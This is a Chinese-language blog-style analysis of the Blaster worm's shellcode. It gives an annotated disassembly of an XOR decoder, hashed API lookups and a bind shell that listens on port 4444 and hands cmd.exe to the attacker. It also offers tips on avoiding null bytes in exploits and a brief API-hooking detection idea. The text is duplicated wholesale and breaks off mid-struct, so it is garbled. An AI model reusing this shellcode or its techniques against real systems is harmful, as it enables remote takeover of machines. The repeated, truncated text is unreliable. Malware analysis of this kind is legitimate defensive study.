“冲击波”病毒的shellcode源代码
作者:
“冲击波”病毒的shellcode源代码
2年前“冲击波”病毒爆发时,我曾经对它的SHELLCODE进行过分析,现在把我当时写的分析献出来,
让大家看看“一代名毒”是怎样的。一般来说,shellcode都是这样写的,因此只要hook shellcode必须调用的api,判断esp和eip
的差值如果在0x1000以内(也就是说代码在堆栈里运行),那么基本上可以确认系统受到缓冲区溢出攻击,该进程必须马上退出。
当然,有些更厉害的shellcode采用直接调用native api,raw socket收发包等技术,hook api监视缓冲区溢出攻击的方法就不灵了,
要考虑其他方法,但这样写shellcode,它的体积必然很大,而且各个系统很难通用,也有它的缺陷。
;在exploit中由于不能有0和5C字符存在,所以写代码时要注意,因为很多代码都是有0的,比如
;mov ecx,8的机器码是b9 08 00 00 00有3个0,所以必须改为xor ecx,ecx/mov cl,8或push 8/pop ecx或xor ecx,ecx--sub ecx,-8
:00401000 90 nop
:00401001 90 nop
:00401002 90 nop
:00401003 EB19 jmp 0040101E
:00401005 5E pop esi ;esi=00401023,从00401023地址开始的代码将要被还原,实际上esi指向的地址在堆栈中是不固定的
:00401006 31C9 xor ecx, ecx
:00401008 81E989FFFFFF sub ecx, FFFFFF89==-77 ;ecx=77h
:0040100E 813680BF3294 xor dword ptr [esi], 9432BF80 ;还原从00401023开始被加密的代码
:00401014 81EEFCFFFFFF sub esi, FFFFFFFC ;add esi,4
:0040101A E2F2 loop 0040100E
:0040101C EB05 jmp 00401023 ;还原已经完成,跳到被还原的代码处执行
:0040101E E8E2FFFFFF call 00401005 ;这条指令相当于push 00401023,jmp 00401005两条指令的集合
;此处开始的代码已经被还原:
:00401023 83EC34 sub esp, 00000034
:00401026 8BF4 mov esi, esp ;esi-->变量表
:00401028 E847010000 call 00401174 ;eax=77e40000h=hkernel32
:0040102D 8906 mov dword ptr [esi], eax
:0040102F FF36 push dword ptr [esi] ;=77e40000h
:00401031 688E4E0EEC push EC0E4E8E ;LoadLibraryA字符串的自定义编码
:00401036 E861010000 call 0040119C
:0040103B 894608 mov dword ptr [esi+08], eax ;=77e605d8h
:0040103E FF36 push dword ptr [esi] ;=77e40000h
:00401040 68ADD905CE push CE05D9AD ;WaitForSingleObject字符串的自定义编码
:00401045 E852010000 call 0040119C
:0040104A 89460C mov dword ptr [esi+0C], eax ;=77e59d5bh
:0040104D 686C6C0000 push 00006C6C
:00401052 6833322E64 push 642E3233
:00401057 687773325F push 5F327377 ;"ws2_32.dll"
:0040105C 54 push esp ;esp-->"ws2_32.dll"
:0040105D FF5608 call LoadLibraryA -->ws2_32.dll
:00401060 894604 mov dword ptr [esi+04], eax ;=71a20000h(ws2_32.dll 在内存里的地址)
:00401063 FF36 push dword ptr [esi] ;=77e40000h
:00401065 6872FEB316 push 16B3FE72 ;CreateProcessA字符串的自定义编码
:0040106A E82D010000 call 0040119C
:0040106F 894610 mov dword ptr [esi+10], eax
:00401072 FF36 push dword ptr [esi] ;=77e40000h
:00401074 687ED8E273 push 73E2D87E ;ExitProcess字符串的自定义编码
:00401079 E81E010000 call 0040119C
:0040107E 894614 mov dword ptr [esi+14], eax
:00401081 FF7604 push [esi+04] ;=71a20000h
:00401084 68CBEDFC3B push 3BFCEDCB ;WSAStartup字符串的自定义编码
:00401089 E80E010000 call 0040119C
:0040108E 894618 mov dword ptr [esi+18], eax
:00401091 FF7604 push [esi+04] ;=71a20000h
:00401094 68D909F5AD push ADF509D9 ;WSASocketA字符串的自定义编码
:00401099 E8FE000000 call 0040119C
:0040109E 89461C mov dword ptr [esi+1C], eax
:004010A1 FF7604 push [esi+04] ;=71a20000h
:004010A4 68A41A70C7 push C7701AA4 ;bind字符串的自定义编码
:004010A9 E8EE000000 call 0040119C
:004010AE 894620 mov dword ptr [esi+20], eax
:004010B1 FF7604 push [esi+04] ;=71a20000h
:004010B4 68A4AD2EE9 push E92EADA4 ;listen字符串的自定义编码
:004010B9 E8DE000000 call 0040119C
:004010BE 894624 mov dword ptr [esi+24], eax
:004010C1 FF7604 push [esi+04] ;=71a20000h
:004010C4 68E5498649 push 498649E5 ;accept字符串的自定义编码
:004010C9 E8CE000000 call 0040119C
:004010CE 894628 mov dword ptr [esi+28], eax
:004010D1 FF7604 push [esi+04] ;=71a20000h
:004010D4 68E779C679 push 79C679E7 ;closesocket字符串的自定义编码
:004010D9 E8BE000000 call 0040119C
:004010DE 89462C mov dword ptr [esi+2C], eax
:004010E1 33FF xor edi, edi
:004010E3 81EC90010000 sub esp, 00000190 ;在堆栈里分配临时空间0x190字节
:004010E9 54 push esp
:004010EA 6801010000 push 00000101 ;wsock 1.1
:004010EF FF5618 call WSAStartup ;启动WINSOCK 1.1库
:004010F2 50 push eax =0
:004010F3 50 push eax =0
:004010F4 50 push eax =0
:004010F5 50 push eax =0
:004010F6 40 inc eax =1
:004010F7 50 push eax =1
:004010F8 40 inc eax =2
:004010F9 50 push eax =2 ;esp-->2,1,0,0,0,0
:004010FA FF561C call WSASocketA ;建立用于监听的TCP SOCKET
:004010FD 8BD8 mov ebx, eax =010ch
:004010FF 57 push edi =0
:00401100 57 push edi =0
:00401101 680200115C push 5C110002 ;port=4444 ;sockaddr_in结构没有填好,少了4字节
:00401106 8BCC mov ecx, esp ;ecx-->0200115c0000000000000000
:00401108 6A16 push 00000016h ;这个参数应该是10h
:0040110A 51 push ecx ;ecx-->0200115c000000000000000
:0040110B 53 push ebx ;hsocket
:0040110C FF5620 call bind ;绑定4444端口
:0040110F 57 push edi =0
:00401110 53 push ebx ;hsocket
:00401111 FF5624 call listen ;4444端口开始进入监听状态
:00401114 57 push edi =0
:00401115 51 push ecx =0a2340 ;这个参数好象有问题,可以是0
:00401116 53 push ebx ;hsocket
:00401117 FF5628 call accept ;接受攻击主机的连接,开始接收对方传来的DOS命令
:0040111A 8BD0 mov edx, eax =324h, handle of socket to translate
:0040111C 6865786500 push 00657865
:00401121 68636D642E push 2E646D63 ;"cmd.exe"
:00401126 896630 mov dword ptr [esi+30], esp -->"cmd.exe"
PROCESS_INFORMATION STRUCT
hProcess DWORD ?
hThread DWORD ?
dwProcessId DWORD ?
dwThreadId DWORD ?
PROCESS_INFORMATION ENDS
STARTUPINFO STRUCT
00 cb DWORD ? ;44h
04 lpReserved DWORD ?
08 lpDesktop DWORD ?
0c lpTitle DWORD ?
10 dwX DWORD ?
14 dwY DWORD ?
18 dwXSize DWORD ?
1c dwYSize DWORD ?
20 dwXCountChars DWORD ?
24 dwYCountChars DWORD ?
28 dwFillAttribute DWORD ?
2c dwFlags DWORD ? ;100h, set STARTF_USESTDHANDLES flags
让大家看看“一代名毒”是怎样的。一般来说,shellcode都是这样写的,因此只要hook shellcode必须调用的api,判断esp和eip
的差值如果在0x1000以内(也就是说代码在堆栈里运行),那么基本上可以确认系统受到缓冲区溢出攻击,该进程必须马上退出。
当然,有些更厉害的shellcode采用直接调用native api,raw socket收发包等技术,hook api监视缓冲区溢出攻击的方法就不灵了,
要考虑其他方法,但这样写shellcode,它的体积必然很大,而且各个系统很难通用,也有它的缺陷。
;在exploit中由于不能有0和5C字符存在,所以写代码时要注意,因为很多代码都是有0的,比如
;mov ecx,8的机器码是b9 08 00 00 00有3个0,所以必须改为xor ecx,ecx/mov cl,8或push 8/pop ecx或xor ecx,ecx--sub ecx,-8
:00401000 90 nop
:00401001 90 nop
:00401002 90 nop
:00401003 EB19 jmp 0040101E
:00401005 5E pop esi ;esi=00401023,从00401023地址开始的代码将要被还原,实际上esi指向的地址在堆栈中是不固定的
:00401006 31C9 xor ecx, ecx
:00401008 81E989FFFFFF sub ecx, FFFFFF89==-77 ;ecx=77h
:0040100E 813680BF3294 xor dword ptr [esi], 9432BF80 ;还原从00401023开始被加密的代码
:00401014 81EEFCFFFFFF sub esi, FFFFFFFC ;add esi,4
:0040101A E2F2 loop 0040100E
:0040101C EB05 jmp 00401023 ;还原已经完成,跳到被还原的代码处执行
:0040101E E8E2FFFFFF call 00401005 ;这条指令相当于push 00401023,jmp 00401005两条指令的集合
;此处开始的代码已经被还原:
:00401023 83EC34 sub esp, 00000034
:00401026 8BF4 mov esi, esp ;esi-->变量表
:00401028 E847010000 call 00401174 ;eax=77e40000h=hkernel32
:0040102D 8906 mov dword ptr [esi], eax
:0040102F FF36 push dword ptr [esi] ;=77e40000h
:00401031 688E4E0EEC push EC0E4E8E ;LoadLibraryA字符串的自定义编码
:00401036 E861010000 call 0040119C
:0040103B 894608 mov dword ptr [esi+08], eax ;=77e605d8h
:0040103E FF36 push dword ptr [esi] ;=77e40000h
:00401040 68ADD905CE push CE05D9AD ;WaitForSingleObject字符串的自定义编码
:00401045 E852010000 call 0040119C
:0040104A 89460C mov dword ptr [esi+0C], eax ;=77e59d5bh
:0040104D 686C6C0000 push 00006C6C
:00401052 6833322E64 push 642E3233
:00401057 687773325F push 5F327377 ;"ws2_32.dll"
:0040105C 54 push esp ;esp-->"ws2_32.dll"
:0040105D FF5608 call LoadLibraryA -->ws2_32.dll
:00401060 894604 mov dword ptr [esi+04], eax ;=71a20000h(ws2_32.dll 在内存里的地址)
:00401063 FF36 push dword ptr [esi] ;=77e40000h
:00401065 6872FEB316 push 16B3FE72 ;CreateProcessA字符串的自定义编码
:0040106A E82D010000 call 0040119C
:0040106F 894610 mov dword ptr [esi+10], eax
:00401072 FF36 push dword ptr [esi] ;=77e40000h
:00401074 687ED8E273 push 73E2D87E ;ExitProcess字符串的自定义编码
:00401079 E81E010000 call 0040119C
:0040107E 894614 mov dword ptr [esi+14], eax
:00401081 FF7604 push [esi+04] ;=71a20000h
:00401084 68CBEDFC3B push 3BFCEDCB ;WSAStartup字符串的自定义编码
:00401089 E80E010000 call 0040119C
:0040108E 894618 mov dword ptr [esi+18], eax
:00401091 FF7604 push [esi+04] ;=71a20000h
:00401094 68D909F5AD push ADF509D9 ;WSASocketA字符串的自定义编码
:00401099 E8FE000000 call 0040119C
:0040109E 89461C mov dword ptr [esi+1C], eax
:004010A1 FF7604 push [esi+04] ;=71a20000h
:004010A4 68A41A70C7 push C7701AA4 ;bind字符串的自定义编码
:004010A9 E8EE000000 call 0040119C
:004010AE 894620 mov dword ptr [esi+20], eax
:004010B1 FF7604 push [esi+04] ;=71a20000h
:004010B4 68A4AD2EE9 push E92EADA4 ;listen字符串的自定义编码
:004010B9 E8DE000000 call 0040119C
:004010BE 894624 mov dword ptr [esi+24], eax
:004010C1 FF7604 push [esi+04] ;=71a20000h
:004010C4 68E5498649 push 498649E5 ;accept字符串的自定义编码
:004010C9 E8CE000000 call 0040119C
:004010CE 894628 mov dword ptr [esi+28], eax
:004010D1 FF7604 push [esi+04] ;=71a20000h
:004010D4 68E779C679 push 79C679E7 ;closesocket字符串的自定义编码
:004010D9 E8BE000000 call 0040119C
:004010DE 89462C mov dword ptr [esi+2C], eax
:004010E1 33FF xor edi, edi
:004010E3 81EC90010000 sub esp, 00000190 ;在堆栈里分配临时空间0x190字节
:004010E9 54 push esp
:004010EA 6801010000 push 00000101 ;wsock 1.1
:004010EF FF5618 call WSAStartup ;启动WINSOCK 1.1库
:004010F2 50 push eax =0
:004010F3 50 push eax =0
:004010F4 50 push eax =0
:004010F5 50 push eax =0
:004010F6 40 inc eax =1
:004010F7 50 push eax =1
:004010F8 40 inc eax =2
:004010F9 50 push eax =2 ;esp-->2,1,0,0,0,0
:004010FA FF561C call WSASocketA ;建立用于监听的TCP SOCKET
:004010FD 8BD8 mov ebx, eax =010ch
:004010FF 57 push edi =0
:00401100 57 push edi =0
:00401101 680200115C push 5C110002 ;port=4444 ;sockaddr_in结构没有填好,少了4字节
:00401106 8BCC mov ecx, esp ;ecx-->0200115c0000000000000000
:00401108 6A16 push 00000016h ;这个参数应该是10h
:0040110A 51 push ecx ;ecx-->0200115c000000000000000
:0040110B 53 push ebx ;hsocket
:0040110C FF5620 call bind ;绑定4444端口
:0040110F 57 push edi =0
:00401110 53 push ebx ;hsocket
:00401111 FF5624 call listen ;4444端口开始进入监听状态
:00401114 57 push edi =0
:00401115 51 push ecx =0a2340 ;这个参数好象有问题,可以是0
:00401116 53 push ebx ;hsocket
:00401117 FF5628 call accept ;接受攻击主机的连接,开始接收对方传来的DOS命令
:0040111A 8BD0 mov edx, eax =324h, handle of socket to translate
:0040111C 6865786500 push 00657865
:00401121 68636D642E push 2E646D63 ;"cmd.exe"
:00401126 896630 mov dword ptr [esi+30], esp -->"cmd.exe"
PROCESS_INFORMATION STRUCT
hProcess DWORD ?
hThread DWORD ?
dwProcessId DWORD ?
dwThreadId DWORD ?
PROCESS_INFORMATION ENDS
STARTUPINFO STRUCT
00 cb DWORD ? ;44h
04 lpReserved DWORD ?
08 lpDesktop DWORD ?
0c lpTitle DWORD ?
10 dwX DWORD ?
14 dwY DWORD ?
18 dwXSize DWORD ?
1c dwYSize DWORD ?
20 dwXCountChars DWORD ?
24 dwYCountChars DWORD ?
28 dwFillAttribute DWORD ?
2c dwFlags DWORD ? ;100h, set STARTF_USESTDHANDLES flags